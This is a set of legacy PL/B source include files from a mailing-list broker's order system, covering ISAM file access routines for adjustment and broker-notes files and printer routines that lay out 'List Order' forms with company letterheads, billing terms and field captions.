NADJWRT BRANCH NADJFLAG TO NADJ5 skip open if already opened
	CALL NADJOPEN
NADJ5 FILEPI 1;NADJFILE
	WRITE NADJFILE,NADJFLD;adjvars
	RETURN
..............................................................................
.
. ENTRY POINT : NADJUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE LIST FILE
.
.	Rewrite the record fetched by a previous key read with the current
.	contents of adjvars. Opens the file on first call.
NADJUPD BRANCH NADJFLAG TO NADJ6 skip open if already opened
	CALL NADJOPEN
NADJ6 FILEPI 1;NADJFILE
	UPDATE NADJFILE;adjvars
	RETURN
..............................................................................
.
. ENTRY POINT : NADJDEL
. REQUIRED : 'NADJFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
.	Delete the record with key NADJFLD; opens the file on first call.
NADJDEL BRANCH NADJFLAG TO NADJ7 skip open if already opened
	CALL NADJOPEN
NADJ7 FILEPI 1;NADJFILE
	DELETE NADJFILE,NADJFLD
	RETURN
...............................................................................
.
. ENTRY POINT : NADJOPEN
. REQUIRED : 'NADJFLAG'
. RETURNED    : 'NADJFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MASTER ADJUSTMENT FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
.	Open NINADJ by name; on I/O failure the trap routes to NADJGONE,
.	which reports the file name via the common FILEGONE handler.
.	On success NADJFLAG is set to 1 so callers skip reopening.
NADJOPEN TRAP NADJGONE IF IO
	OPEN NADJFILE,NADJNAME
	TRAPCLR IO
	MOVE C1 TO NADJFLAG flag the file as open
	RETURN
NADJGONE MOVE NADJNAME TO FILENAME
	CALL FILEGONE
.
..............................................................................
<file_sep>/include/Nbrk2dd.inc
..............................................................................
.
. NBRK2DD INCLUSION
. NIN BROKER NOTES FILE DEFINITION
.
. FILE NAME : NINBRK2
. REC LENGTH: 754
. INDEX KEY : 1-4
.
.ASH 29DEC2000 - FILE CREATED
..............................................................................
.
.	NINBRK2 broker-notes file handle and record layout (var-len 754).
NBRK2FILE IFILE KEYLEN=4,VAR=754,NODUPLICATES
.NBRK2NAME INIT "NINBRK2.ISI|20.20.30.103:502"
NBRK2NAME INIT "NINBRK2.ISI"
NBRK2FLD DIM 4 isam key work field (broker number)
NBRK2FLAG FORM 1 open flag
nBRK2lock form 1 0 or 1 = filepi, 2 = record locking, 3 = no locks
..............................................................................
NBRK2VARS list
BRK2BRK dim 4 1-4 BRK NUMBER
BRK2NOTES DIM 750 5-754 BRK NOTES
listend
<file_sep>/include/prtorderpage1PL.inc
.test test.test
. include common.inc
. include cons.inc
. include norddd.inc
.str500 dim 500
. include hp.inc
.Patch 1.31 12Jul2007 JD Fixed zip
.Patch 1.3 8JAN2007 DLH PL LOGO
.Patch 1.21 30JAN2006 JD Company/Broker address print Mailer/Office copy.
.Patch 1.2 06AUG2004 ASH Logo Conversion
.Patch 1.1 17FEB2004 ASH DATACARD CONVERSION
.	External entry: order-detail line printer, resolved from NCMP0002.
prtdetail external "NCMP0002;prtdetail"
.Blockout PICT
.Blockout1 PICT
.font1 font
.Font4 font
.font5 font
.fontO8 font
.fontO9I font
.fontO10 font
..fontO10B font
.fontO12B font
.fontO14 font
.FontO14B font
.FontO14BI font
.FontO18I font
.FontO7 font
.FontO7dot5 font
.FontO7dot5B font
.FontO7dot5I font
.FontO7dot5BI font
.FontO18B font
.FontO18BI font
.PRTPG24B font
.PRTPG24I font
.PRTPG10 font
..Create fonts to be used
.sevenfive form "7.5"
. create font1,"Times New Roman",size=14,bold
. create fontO8,"Times New Roman",size=8
. create font5,"Times New Roman",size=11
. create fontO9I,"Times New Roman",size=9,Italic
. create fontO10,"Times New Roman",size=10
.. create fontO10B,"Times New Roman",size=10,Bold
. create fontO12B,"Times New Roman",size=12,Bold
. create fontO14,"Times New Roman",size=14
. create fontO14B,"Times New Roman",size=14,Bold
. create fontO14BI,"Times New Roman",size=14,Bold,Italic
. create fontO18I,"Times New Roman",size=18,Italic
. create fontO7,"Times New Roman",size=7
. create fontO7dot5,"Times New Roman",size=sevenfive
. create fontO7dot5I,"Times New Roman",size=sevenfive,Italic
. create fontO7dot5b,"Times New Roman",size=sevenfive,Bold
. create fontO7dot5bI,"Times New Roman",size=sevenfive,Bold,Italic
. create fontO18B,"Times New Roman",size=18,Bold
. create fontO18BI,"Times New Roman",size=18,Bold,Italic
..
. create PRTpg24B,"Times New Roman",size=24,Bold
. create PRTpg24I,"Times New Roman",size=24,Italic
. create PRTpg10,"Times New Roman",size=10
.	Color handles and work field used by the print routines below.
GreyFill Color
.Black Color
NoFIll Color
colornum form 24
.Laser PFILE ^
.Laser PFILE
. PRTOPEN Laser,str500,"test fax"
.testing
. pack NORDFLD,"425663"
. move C1,NORDPATH
. call NORDKEY
. call prtmlrboxGui
. call prtordfrmGuiA
. call prtdetail using laser,NORDFLD
. shutdown
.hi English 1000 units to an inch
.old code 300 units per inch
.PortraitLTRHEADGuiLand Routine Laser
. PRTPAGE Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon,*ORIENT=*LANDSCAPE:
. *p=3925:250,*font=prtpg24B,"Names ":
. *font=prtpg24I," in the News":
. *PENSIZE=10,*p=3550:550,*Line=7050:550:
. *p=3925:650,*font=prtpg10,"C A L I F O R N I A I N C.":
. *p=2800:7900,*font=prtpg10,"1300 Clay Street, 11th Floor, ":
. "Oakland, CA 94612-1429 ","·":
. " 415-989-3350 ","·"," Fax 415-433-7796"
. goto eoj
.
.prtordfrmGuiA Routine Laser
.	Print the static "List Order" form overlay, variant A.
.	Letterhead: Pacific Lists text block when OcompID = "P", otherwise
.	the NIN logo picture (NINLogo). Then draws the form frame, the
.	Note/Billing/Payment/Addressing/Important boilerplate column on the
.	right, and the field captions for the order body.
.	Requires: Laser opened by caller; OcompID set; NINLogo loaded.
prtordfrmGuiA
.List Management
.	prtpage	Laser;"D 14154337796 N<NAME> SD<NAME> (510) 302-4660 !^]":
.begin patch 1.3
.	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon
.end patch 1.3
.START PATCH 1.2 REPLACED LOGIC
.	*p=5663:125,*font=fontO18b,"Names ":
.	*font=FontO18I,"in the News":
.	*PENSIZE=10,*p=5402:400,*Line=8402:400:
.	*p=5663:450,*font=fontO10,"C A L I F O R N I A I N C .":
.	*p=6120:693,*font=fontO7,"1300 Clay Street, 11th Floor":
.	*p=6204:793,"Oakland, CA 94612-1429":
.	*p=6027:893,"415-989-3350 ","·"," Fax 415-433-7796":
.begin patch 1.3
	IF (OcompID = "P") Pacific Lists letterhead
	prtpage Laser;*p=5663:25,*font=fontO18b,"Pacific Lists, Inc.":
	*p=6120:343,*font=fontO7,"1300 Clay St. 11th Floor":
.START PATCH 1.31
	*p=6014:443,"Oakland, CA 94612-1492":
.	*p=6014:443,"Oakland, CA 94312-1492":
.End PATCH 1.31
	*p=5980:543,"415-945-9450 ","·"," Fax 415-945-9451":
	*p=5980:643,"A Division of Names in the News"
.	prtpage Laser;*p=5663:25,*font=fontO18b,"Pacific Lists, Inc.":
.	*p=6120:343,*font=fontO7,"100 Tamal Plaza, Suite 50":
.	*p=6014:443,"Corte Madera, CA 94925-1182":
.	*p=5980:543,"415-945-9450 ","·"," Fax 415-945-9451":
.	*p=5980:643,"A Division of Names in the News"
	Else NIN letterhead is a picture
	prtpage Laser;*Pictrect=*off,*PICT=0:800:5350:10350:NINLogo
	endif
.END PATCH 1.2 REPLACED LOGIC
.	Form frame: title boxes, rule lines, right-hand column divider.
	prtpage Laser;*RECT=115:365:0:1000:
.end patch 1.3
	*RECT=115:365:2500:4250:
	*p=125:125,*font=FontO14bi,"List Order":
	*p=0:637,*line=5233:637:
.START PATCH 1.2 REPLACED LOGIC
.	*p=5400:637,*line=8067:637:
	*p=5400:787,*line=8067:787:
.END PATCH 1.2 REPLACED LOGIC
.	*p=0:637,*line=0:10625:
	*p=5:637,*line=5:10625:
.START PATCH 1.2 REPLACED LOGIC
.	*p5400:637,*line=5400:10625:
	*p5400:787,*line=5400:10625:
.END PATCH 1.2 REPLACED LOGIC
	*p5625:1292,*Font=FontO7Dot5B,"Note":
	*p5625:1475,*Font=FontO7Dot5,"Names are furnished for one-time use to the":
	*p5625:1592,"organization or individual requesting the rental or":
	*p5625:1709,"exchange and are not to be copied, revised in any":
	*p5625:1826,"form, sold, or given to any other party. Although":
	*p5625:1943,"we believe the information concerning this list to":
	*p5625:2060,"be accurate we cannot guarantee its accuracy or":
	*p5625:2177,"the outcome of the mailing. Names cannot be used":
	*p5625:2294,"for telemarketing without written permission from":
	*p5625:2411,"the list owner. Post-merge tapes cannot be used":
	*p5625:2528,"for storing and scanning purposes without":
	*p5625:2645,"notification to the list owner. Mailer reserves the":
	*p5625:2762,"right to mail duplicates at a later date.":
	*p5625:3062,*Font=FontO7Dot5B,"Billing":
.begin patch 1.3
.	*p5625:3245,*Font=FontO7Dot5,"On completion of addressing, bill rentals c/o":
	*p5625:3245,*Font=FontO7Dot5,"On completion of addressing, bill rentals c/o"
.START PATCH 1.2 REPLACED LOGIC
.	*p5625:3362,"Names in the News, California, Inc., less":
.	*p5625:3479,"brokerage commission. We will bill mailer on":
.	*p5625:3596,"behalf of list owner; payment (less commission)":
.	*p5625:3713,"will be made upon receipt of payment from the":
.	*p5625:3830,"mailer. We reserve the right to deduct for":
.	*p5625:3947,"unusable names from payment to list owner. We":
.	*p5625:4064,"act only as agent for the list owner or the mailer":
.	*p5625:4181,"in these transactions.":
.....................................................
.begin patch 1.3
.	Billing paragraph names the billing company per OcompID.
	IF (OcompID = "P")
	PrtPage Laser;*p5625:3362,"Pacific Lists, Inc., less brokerage commission.":
	*p5625:3479,"We will bill mailer on behalf of list owner;":
	*p5625:3596,"payment (less commission) will be made upon":
	*p5625:3713,"receipt of payment from the mailer. We reserve":
	*p5625:3830,"the right to deduct for unusable names from":
	*p5625:3947,"payment to list owner. We act only as agent":
	*p5625:4064,"for the list owner or the mailer in these":
	*p5625:4181,"transactions."
	Else
	PrtPage Laser;*p5625:3362,"Names in the News, less brokerage commission.":
	*p5625:3479,"We will bill mailer on behalf of list owner;":
	*p5625:3596,"payment (less commission) will be made upon":
	*p5625:3713,"receipt of payment from the mailer. We reserve":
	*p5625:3830,"the right to deduct for unusable names from":
	*p5625:3947,"payment to list owner. We act only as agent":
	*p5625:4064,"for the list owner or the mailer in these":
	*p5625:4181,"transactions."
	Endif
.END PATCH 1.2 REPLACED LOGIC
	PrtPage Laser;*p5625:4548,*font=FontO7Dot5B,"Payment":
.end patch 1.3
	*p5625:4731,*font=FontO7Dot5,"Due upon receipt of invoice. Full amount":
	*p5625:4848,"required on orders cancelled after mail date; ":
	*p5625:4965,"Cancellation by mailer prior to or on mail date ":
	*p5625:5082,"subject to a $75.00 processing fee. Volume discount":
	*p5625:5199,"includes allowances for rejected data. No additional":
	*p5625:5316,"deductions allowed. Discount on Base rate only -- ":
	*p5625:5433,"select fees are applied to gross quantity. No":
	*p5625:5550,"computer verification necessary.":
	*p5625:5917,*font=FontO7Dot5B,"Addressing":
	*p5625:6100,*font=FontO7Dot5,"Unless stated in special instructions, it is":
	*p5625:6217,"assumed list is in strict zip sequence. Address":
	*p5625:6334,"USA names only. All Canadian, foreign, military,":
	*p5625:6451,"business, library and institutional names are to":
	*p5625:6568,"be omitted.":
	*RECT=6733:6891:5625:5750:
	*p5775:6733,"This is a test. Address a representative cross":
	*p5775:6858,"section and keep a record to avoid duplication":
	*p5775:6975,"on continuations.":
	*RECT=7116:7266:5625:5750:
	*p5775:7116,"This is a continuation. No omit required.":
	*RECT=7366:7516:5625:5750:
	*p5775:7366,"This is a continuation. Omit the following:":
	*RECT=7866:8016:5625:5750:
	*p5775:7866,"Entire list/or all available in specified":
	*p5775:7983,"select. Advise if quantity differs by 10% or more.":
	*p5625:8233,*font=FontO7Dot5B,"Important":
	*p5625:8416,*font=FontO7Dot5,"If you cannot comply with these instructions, or":
	*p5625:8533,"if charges shown are not correct, notify us by":
	*p5625:8650,"phone for our approval prior to addressing.":
	*p5625:8767,"Adjustments not approved before addressing will":
	*p5625:8884,"not be accepted. Magnetic Tape orders - tape will":
	*p5625:9001,"not be returned unless requested in writing by ":
.begin patch 1.3
	*p5625:9118,"list owner."
.	*p5625:9118,"list owner.":
.	Contact caption matches the letterhead company.
	IF (OcompID = "P")
	PrtPage Laser;*p5625:9300,"PL Contact:"
	Else
	PrtPage Laser;*p5625:9300,"NIN Contact:"
	Endif
.	*p5875:10400,*font=fonto9i,"Member Direct Marketing Association"
	PrtPage Laser;*p5875:10400,*font=fonto9i,"Member Direct Marketing Association"
.end patch 1.3
.START PATCH 1.1 REPLACED LOGIC
.	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
.	*p125:887,*font=FontO7Dot5B,"LR ##":
.	*p2500:887,*font=FontO7Dot5I,"Date:":
.	*p125:1075,"Mailer P.O.":
.	*p2500:1075,"Client No.:":
.	*p125:1263,"Mailer:":
.	*p125:1763,"Offer:":
.	*p125:2263,"List Owner:":
.	*p125:3138,"CC To:":
.	*p125:3451,"List:":
.	*p125:4076,"Quantity:":
.	*p2500:4076,"Per M $":
.	*p125:4451,"Key/List ID:":
.	*p125:4801,"Furnished on:":
.	*p125:5001,"Return to:":
.	*p125:6501,"Ship to arrive by:":
.	*p2500:6501,"Via:":
.	*p125:6876,"Mail Date:":
.	*p125:7126,*font=FontO7Dot5BI,"Special Instructions:",*font=FontO7Dot5
.	Field captions for the order-form body.
	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
	*p125:800,*font=FontO7Dot5B,"LR ##":
	*p2500:800,*font=FontO7Dot5I,"Date:":
	*p125:988,"Mailer P.O.":
	*p2500:988,"Client No.:":
	*p125:1176,"Mailer:":
;	*p125:1603,"Offer:":
;	*p125:2093,"List Owner:":
;	*p125:2918,"CC To:":
.START PATCH 1.21
	*p125:1876,"Offer:":
	*p125:2281,"List Owner:":
	*p125:3006,"CC To:":
.START PATCH 1.2
	*p125:3211,"List:":
	*p125:3587,"Quantity:":
	*p2500:3587,"Base $":
	*p125:5251,"Key/List ID:":
	*p125:5501,"Furnished on:":
	*p125:5751,"Return to:":
	*p125:6689,"Ship to arrive by:":
	*p2200:6689,"Via:":
	*p125:6876,"Mail Date:":
	*p125:7126,*font=FontO7Dot5BI,"Special Instructions:",*font=FontO7Dot5
.END PATCH 1.1 REPLACED LOGIC
	return
.prtordfrmGuiB Routine Laser
.	Print the static "List Order" form overlay, variant B.
.	Same structure as prtordfrmGuiA but with slightly different
.	right-column text layout (shorter Payment paragraph, shifted rows).
.	Letterhead: Pacific Lists text block when OcompID = "P", otherwise
.	the NIN logo picture (NINLogo).
.	Requires: Laser opened by caller; OcompID set; NINLogo loaded.
prtordfrmGuiB
.	prtpage	Laser;"D 14154337796 N<NAME> SD<NAME> (510) 302-4660 !^]":
	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon
.begin patch 1.3
	IF (OcompID = "P") Pacific Lists letterhead
	prtpage Laser;*p=5663:25,*font=fontO18b,"Pacific Lists, Inc.":
	*p=6120:343,*font=fontO7,"1300 Clay St. 11th Floor":
.START PATCH 1.31
	*p=6014:443,"Oakland, CA 94612-1492":
.	*p=6014:443,"Oakland, CA 94312-1492":
.End PATCH 1.31
	*p=5980:543,"415-945-9450 ","·"," Fax 415-945-9451":
	*p=5980:643,"A Division of Names in the News"
.	prtpage Laser;*p=5663:25,*font=fontO18b,"Pacific Lists, Inc.":
.	*p=6120:343,*font=fontO7,"100 Tamal Plaza, Suite 50":
.	*p=6014:443,"Corte Madera, CA 94925-1182":
.	*p=5980:543,"415-945-9450 ","·"," Fax 415-945-9451":
.	*p=5980:643,"A Division of Names in the News"
.	*p=6120:393,*font=fontO7,"100 Tamal Plaza, Suite 50":
.	*p=6014:493,"Corta Madera, CA 94942-1429":
.	*p=5980:593,"415-945-9450 ","·"," Fax 415-945-9451":
.	*p=6204:793,"A Division of Names in the News"
	Else NIN letterhead is a picture
.START PATCH 1.2 REPLACED LOGIC
.	*p=5663:125,*font=fontO18b,"Names ":
.	*font=FontO18I,"in the News":
.	*PENSIZE=10,*p=5402:400,*Line=8402:400:
.	*p=5663:450,*font=fontO10,"C A L I F O R N I A I N C .":
.	*p=6120:693,*font=fontO7,"1300 Clay Street, 11th Floor":
.	*p=6204:793,"Oakland, CA 94612-1429":
.	*p=6027:893,"415-989-3350 ","·"," Fax 415-433-7796":
	prtpage Laser;*Pictrect=*off,*PICT=0:800:5350:10350:NINLogo
	endif
.End patch 1.3
.END PATCH 1.2 REPLACED LOGIC
.	Form frame: title boxes, rule lines, right-hand column divider.
	prtpage Laser;*RECT=115:365:0:1000:
	*RECT=115:365:2500:4250:
	*p=125:125,*font=FontO14bi,"List Order":
	*p=0:637,*line=5233:637:
.START PATCH 1.2 REPLACED LOGIC
.	*p=5400:637,*line=8067:637:
	*p=5400:787,*line=8067:787:
.END PATCH 1.2 REPLACED LOGIC
.	*p=0:637,*line=0:10625:
	*p=5:637,*line=5:10625:
.START PATCH 1.2 REPLACED LOGIC
.	*p5400:637,*line=5400:10625:
	*p5400:787,*line=5400:10625:
.END PATCH 1.2 REPLACED LOGIC
	*p5625:1475,*Font=FontO7Dot5B,"Note":
	*p5625:1658,*Font=FontO7Dot5,"Names are furnished for one-time use to the":
	*p5625:1775,"organization or individual requesting the rental":
	*p5625:1892,"or exchange and are not to be copied, revised in":
	*p5625:2009,"any form, sold, or given to any other party.":
	*p5625:2126,"Although we believe the information concerning":
	*p5625:2243,"this list to be accurate we cannot guarantee its":
	*p5625:2360,"accuracy or the outcome of the mailing. Names":
	*p5625:2477,"cannot be used for telemarketing without written":
	*p5625:2594,"permission from the list owner. Post-merge tapes":
	*p5625:2711,"cannot be used for storing and scanning":
	*p5625:2828,"purposes without notification to the list owner.":
	*p5625:2945,"Mailer reserves the right to mail duplicates at a":
	*p5625:3062,"later date.":
	*p5625:3312,*Font=FontO7Dot5B,"Billing":
.Begin patch 1.3
.	*p5625:3495,*Font=FontO7Dot5,"On completion of addressing, bill rentals c/o":
	*p5625:3495,*Font=FontO7Dot5,"On completion of addressing, bill rentals c/o"
.START PATCH 1.2 REPLACED LOGIC
.	*p5625:3612,"Names in the News, California, Inc., less":
.	*p5625:3729,"brokerage commission. We will bill mailer on":
.	*p5625:3846,"behalf of list owner; payment (less commission)":
.	*p5625:3963,"will be made upon receipt of payment from the":
.	*p5625:4080,"mailer. We reserve the right to deduct for":
.	*p5625:4197,"unusable names from payment to list owner. We":
.	*p5625:4314,"act only as agent for the list owner or the mailer":
.	*p5625:4431,"in these transactions.":
.....................................................
.	Billing paragraph names the billing company per OcompID.
	IF (OcompID = "P")
	prtpage Laser;*p5625:3612,"Pacific Lists, Inc., less brokerage commission.":
	*p5625:3729,"We will bill mailer on behalf of list owner;":
	*p5625:3846,"payment (less commission) will be made upon":
	*p5625:3963,"receipt of payment from the mailer. We reserve":
	*p5625:4080,"the right to deduct for unusable names from":
	*p5625:4197,"payment to list owner. We act only as agent":
	*p5625:4314,"for the list owner or the mailer in these":
	*p5625:4431,"transactions."
	Else
	prtpage Laser;*p5625:3612,"Names in the News, less brokerage commission.":
	*p5625:3729,"We will bill mailer on behalf of list owner;":
	*p5625:3846,"payment (less commission) will be made upon":
	*p5625:3963,"receipt of payment from the mailer. We reserve":
	*p5625:4080,"the right to deduct for unusable names from":
	*p5625:4197,"payment to list owner. We act only as agent":
	*p5625:4314,"for the list owner or the mailer in these":
	*p5625:4431,"transactions."
	endif
.END PATCH 1.2 REPLACED LOGIC
.	*p5625:4681,*font=FontO7Dot5B,"Payment":
	PrtPage Laser;*p5625:4681,*font=FontO7Dot5B,"Payment":
.End patch 1.3
	*p5625:4864,*font=FontO7Dot5,"Due upon receipt of invoice. Full amount":
	*p5625:4981,"required on orders cancelled after mail date;":
	*p5625:5098,"Cancellation by mailer prior to or on mail date":
	*p5625:5215,"subject to a $75.00 processing fee.":
	*p5625:5565,*font=FontO7Dot5B,"Addressing":
	*p5625:5748,*font=FontO7Dot5,"Unless stated in special instructions, it is":
	*p5625:5865,"assumed list is in strict zip sequence. Address":
	*p5625:5982,"USA names only. All Canadian, foreign, military,":
	*p5625:6099,"business, library and institutional names are to":
	*p5625:6216,"be omitted.":
	*RECT=6733:6891:5625:5750:
	*p5775:6733,"This is a test. Address a representative cross":
	*p5775:6858,"section and keep a record to avoid duplication":
	*p5775:6975,"on continuations.":
	*RECT=7116:7266:5625:5750:
	*p5775:7116,"This is a continuation. No omit required.":
	*RECT=7366:7516:5625:5750:
	*p5775:7366,"This is a continuation. Omit the following:":
	*RECT=7866:8016:5625:5750:
	*p5775:7866,"Entire list/or all available in specified":
	*p5775:7983,"select. Advise if quantity differs by 10% or more.":
	*p5625:8233,*font=FontO7Dot5B,"Important":
	*p5625:8416,*font=FontO7Dot5,"If you cannot comply with these instructions, or":
	*p5625:8533,"if charges shown are not correct, notify us by":
	*p5625:8650,"phone for our approval prior to addressing.":
	*p5625:8767,"Adjustments not approved before addressing will":
	*p5625:8884,"not be accepted. Magnetic Tape orders - tape will":
	*p5625:9001,"not be returned unless requested in writing by ":
.begin patch 1.3
.	*p5625:9118,"list owner.":
	*p5625:9118,"list owner."
.	Contact caption matches the letterhead company.
	IF (OcompID = "P")
	PrtPage Laser;*p5625:9300,"PL Contact:"
	Else
	PrtPage Laser;*p5625:9300,"NIN Contact:"
	Endif
.	*p5875:10400,*font=fonto9i,"Member Direct Marketing Association"
	PrtPage Laser;*p5875:10400,*font=fonto9i,"Member Direct Marketing Association"
.end patch 1.3
.START PATCH 1.1 REPLACED LOGIC
.	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
.	*p125:887,*font=FontO7Dot5B,"LR ##":
.	*p2500:887,*font=FontO7Dot5I,"Date:":
.	*p125:1075,"Mailer P.O.":
.	*p2500:1075,"Client No.:":
.	*p125:1263,"Mailer:":
.	*p125:1763,"Offer:":
.	*p125:2263,"List Owner:":
.	*p125:3138,"CC To:":
.	*p125:3451,"List:":
.	*p125:4076,"Quantity:":
.	*p2500:4076,"Per M $":
.	*p125:4451,"Key/List ID:":
.	*p125:4801,"Furnished on:":
.	*p125:5051,"Return to:":
.	*p125:6501,"Ship to arrive by:":
.	*p2500:6501,"Via:":
.	*p125:6876,"Mail Date:":
.	*p125:7126,*font=FontO7Dot5BI,"Special Instructions:",*font=FontO7Dot5
.	Field captions for the order-form body.
	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
	*p125:800,*font=FontO7Dot5B,"LR ##":
	*p2500:800,*font=FontO7Dot5I,"Date:":
	*p125:988,"Mailer P.O.":
	*p2500:988,"Client No.:":
	*p125:1176,"Mailer:":
;	*p125:1603,"Offer:":
;	*p125:2093,"List Owner:":
;	*p125:2918,"CC To:":
.START PATCH 1.21
	*p125:1876,"Offer:":
	*p125:2281,"List Owner:":
	*p125:3006,"CC To:":
.START PATCH 1.2
	*p125:3211,"List:":
	*p125:3587,"Quantity:":
	*p2500:3587,"Base $":
	*p125:5251,"Key/List ID:":
	*p125:5501,"Furnished on:":
	*p125:5751,"Return to:":
	*p125:6689,"Ship to arrive by:":
	*p2200:6689,"Via:":
	*p125:6876,"Mail Date:":
	*p125:7126,*font=FontO7Dot5BI,"Special Instructions:",*font=FontO7Dot5
.END PATCH 1.1 REPLACED LOGIC
	return
.
.prtmlrboxGui Routine Laser
.	Stamp the "Mailer Copy" banner on the current overlay page.
prtmlrboxGui
	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
	*p=2800:125,*font=FontO14b,"Mailer Copy"
	return
.
.prtofficeboxGui Routine Laser
.	Stamp the "Office Copy" banner on the current overlay page.
prtofficeboxGui
	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
	*p=2800:125,*font=FontO14b,"Office Copy"
	return
.
.prtownerboxGui Routine Laser
.	Stamp the "List Owner Copy" banner on the current overlay page.
prtownerboxGui
	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
	*p=2700:125,*font=FontO14b,"List Owner Copy"
;	*p=2675:125,*font=FontO14b,"List Owner Copy"
	return
.
.prtFulfilboxGui Routine Laser
.	Stamp the "Fulfilment Copy" banner on the current overlay page.
prtFulfilboxGui
	prtpage	Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
	*p=2700:125,*font=FontO14b,"Fulfilment Copy"
	return
. include NORDIO.INC
.prtordfrmPL Routine Laser temporary to print old PLI forms
.  Prints the static portion of the legacy Pacific Lists, Inc. order
.  form: letterhead, field labels, terms-and-conditions paragraphs,
.  signature rectangles and rule lines.  The caller prints the
.  variable order data on top of this overlay.
.  FIX: corrected spelling in printed text ("reserves", "Canada").
prtordfrmPL
        prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon
        prtpage Laser;*p=0:0,*font=PRTpg24B,"Pacific Lists, Inc.":
        *p=3500:20,*font=fonto10,"1300 Clay St. 11th Floor, ":
.START PATCH 1.31
. "Oakland, CA 94312-1492":
        "Oakland, CA 94612-1492":
.End PATCH 1.31
        *p=3750:175,"Office: 415-945-9450 ","·"," Fax 415-945-9451":
        *p=0:350,*font=fontO7,"A Division of Names in the News":
        *p0:675,*font=fonto10,"OUR ##":
        *p0:875,"DATE:":
        *p0:1075,"CLIENT REF.NO.":
        *p0:1325,"CLIENT:":
        *p0:2375,"MAILER:":
        *p0:2675,"OFFER:":
        *p0:3000,"SUPPLIER:":
        *p0:4000,"LIST:":
        *p0:4375,"SELECTION:":
        *p0:4675,"FORMAT:":
        *p0:5025,"KEY EACH LABEL:":
        *p3125:5025,"RATE:":
        *p0:5325,"QUANTITY:":
        *p0:5675,"ADD'L:":
        *p0:5785,"CHARGES:":
        *p0:6625,"SHIP TO:":
        *p4900:1525,"CONTACT:":
        *p5375:1650,"AT:":
        *p4900:2050,"WANTED BY:":
        *p4900:2375,"MAIL DATE:":
        *p4900:2675,"SHIP VIA:":
        *p6275:3160,*font=fonto10B,"MAILER":
        *p6075:4300,"LIST OWNER",*font=FontO9:
        *p5120:3375,"The names furnished for this order may be used once":
        *p5120:3500,"only for the offer stated and may not be duplicated or":
        *p5120:3625,"remailed. We believe information concerning this list":
        *p5120:3750,"to be accurate, but we do not guarantee its accuracy or":
        *p5120:3875,"the outcome of the mailing.":
        *p5120:4550,"Please send a statement of charges to Pacific Lists, Inc.":
        *p5120:4675,"We are acting as agent for the list owner only, and will":
        *p5120:4800,"invoice our client on the owner's behalf. Upon receipt ":
        *p5120:4925,"of payment, we will remit promptly less the standard ":
        *p5120:5050,"brokerage commission. We do not guarantee payment ":
        *p5120:5175,"from the client who is solely responsible for payment on":
        *p5120:5300,"this order. If liability for sales, use or other tax is ":
        *p5120:5425,"asserted, Pacific Lists as agent disclaims all liability ":
        *p5120:5550,"or responsibility for payment or collection of such tax.":
        *p5120:5800,"Unless otherwise stated, names are to be in zip sequence.":
.  FIX: was "resrves"
        *p5120:5925,"Mailer reserves the right to mail multi-buyers.":
.  FIX: was "Canadia"
        *p5120:6175,"Omit: Canada, Puerto Rico, foreign and military names":
        *p5120:6300,"unless otherwise specified."
. prtpage Laser;*RECT=1250:2250:1100:4625:
. *RECT=2900:3900:1100:4625:
        prtpage Laser;*RECT=1250:2250:1300:4825:
        *RECT=3020:4020:1300:4825:
        *RECT=3175:6600:5100:8000
        PrtPage Laser;*p5875:10400,*font=fonto9i,"Member Direct Marketing Association":
        *p3575:7450,*font=fonto10,"Special Instructions",*font=FontO7Dot5:
        *p0:7525,*line=3500:7525:
        *p4725:7525,*line=10000:7525
        return
.Greenbox .blockout supplier
.  Overlays the supplier rectangle (3020:4020, 1300:4825) of the order
.  form with the blockout2.tif image so the supplier block is hidden.
.  NOTE(review): everything after the first RETURN is unreachable -
.  a leftover fill/colour experiment kept for reference.
Greenbox
        CREATE blockout=3:20:30:50:
               "\\NINS1\e\netutils\blockout.tif"
        CREATE blockout1=3:20:30:50:
               "\\NINS1\e\netutils\blockout2.tif"
        prtpage Laser;*Pictrect=*on,*PICT=3020:4020:1300:4825:Blockout1
        return
. Create Black=000:000:000
. Create NoFill=255:255:255
. getitem Black,0,colornum
        prtpage Laser;*fill=*on,*BgColor=colornum,*RECT=2900:3900:1300:4825
. getitem NoFill,0,colornum
        prtpage Laser;*fill=*off,*BgColor=colornum
        return
.  Whitebox: overlays rectangle 1550:2250, 1300:4825 with blockout.tif
.  (*Pictrect is *off here).  Dead code after RETURN as above.
Whitebox
        CREATE blockout=3:20:30:50:
               "\\NINS1\e\netutils\blockout.tif"
        CREATE blockout1=3:20:30:50:
               "\\NINS1\e\netutils\blockout2.tif"
. CREATE blockout=3:13:30:50,"\\nts0\c\netutils\blockout.jpg"
        prtpage Laser;*Pictrect=*off,*PICT=1550:2250:1300:4825:Blockout
        return
. Create Black=000:000:000
. Create NoFill=255:255:255
. getitem Black,0,colornum
        prtpage Laser;*fill=*on,*BgColor=colornum,*RECT=1550:2250:1225:4750
. getitem NoFill,0,colornum
        prtpage Laser;*fill=*off,*BgColor=colornum
        return
<file_sep>/include/NORDIO3.INC
..............................................................................
.
. NORDIO INCLUSION
. NIN ORDER FILE I/O ROUTINES
.
. FILE NAME : NINORD
